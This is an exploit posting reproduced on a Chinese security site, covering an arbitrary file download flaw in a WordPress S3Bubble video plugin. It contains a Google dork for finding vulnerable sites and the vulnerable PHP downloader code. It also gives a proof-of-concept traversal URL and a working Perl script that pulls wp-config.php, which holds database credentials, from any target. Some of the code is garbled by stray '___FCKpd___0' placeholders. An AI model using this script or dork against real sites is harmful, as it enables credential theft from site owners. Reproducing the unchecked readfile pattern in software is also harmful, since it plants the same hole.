首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
WordPress S3Bubble Cloud Video With Adverts / Analytics Arbitrary File Download
来源:@DosPerl 作者:CrashBandicot 发布时间:2015-07-10  
# Exploit Title: Wordpress S3Bubble Cloud Video With Adverts & Analytics - Arbitrary File Download
# Google Dork: inurl:/plugins/s3bubble-amazon-s3-html-5-video-with-adverts/
# Date: 04/07/2015
# Exploit Author: CrashBandicot @DosPerl
# Vendor Homepage: https://s3bubble.com
# Software Link: https://wordpress.org/plugins/s3bubble-amazon-s3-audio-streaming/
# Version: 2.0
# Tested on: MSWin32


# Vulnerable File : /wp-content/plugins/..../assets/plugins/ultimate/content/downloader.php

<?php 
   header("Content-Type: application/octet-stream");
   header("Content-Disposition: attachment; filename=". 
___FCKpd___0
GET['name']); $path = urldecode(
___FCKpd___0
GET['path']); if(isset($path))readfile($path); ?> # PoC : http://127.0.0.1/wp-content/plugins/s3bubble-amazon-s3-html-5-video-with-adverts/assets/plugins/ultimate/content/downloader.php?name=wp-config.php&path=../../../../../../../wp-config.php # Exploit : #!/usr/bin/perl use LWP::UserAgent; system(($^O eq 'MSWin32') ? 'cls' : 'clear'); if(@ARGV < 2) { die("\n\n[+] usage : perl ___FCKpd___0 site.com /path/"); } print q{ Wordpress S3Bubble Cloud Video With Adverts & Analytics - Arbitrary File Download ->CrashBandicot }; ($Target,$path) = @ARGV; if($Target !~ /^(http|https):\/\//) { $Target = "http://$Target"; } $xpl = "/wp-content/plugins/s3bubble-amazon-s3-html-5-video-with-adverts/assets/plugins/ultimate/content/downloader.php?path=../../../../../../../wp-config.php"; my $url = $Target.$path.$xpl; print "\n [?] Exploiting ...... \n\n"; $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 }); $req = $ua->get($url,":content_file" => "wp-config.php"); if ($req->is_success) { print "[+] $url Exploited!\n\n"; print "[+] File save to name : wp-config.php\n"; } else { die("[!] Exploit Failed !\n"); } _END_

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Adobe Flash Player Nellymoser
·ipTIME DHCP Remote Command Exe
·ipTIME Remote Code Execution
·MiniUPNPd 1.0 Remote Denial Of
·Blueberry Express 5.9.x SEH Bu
·Adobe Flash Player ByteArray U
·Endian Firewall < 3.0.0 - OS C
·GWC CMS 1.0 SQL Injection
·Endian Firewall < 3.0.0 - OS C
·Symantec EP 12.1.4013 Denial O
·Safari 8.0.X / OS X Yosemite 1
·NTP MON_GETLIST Query Amplific
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved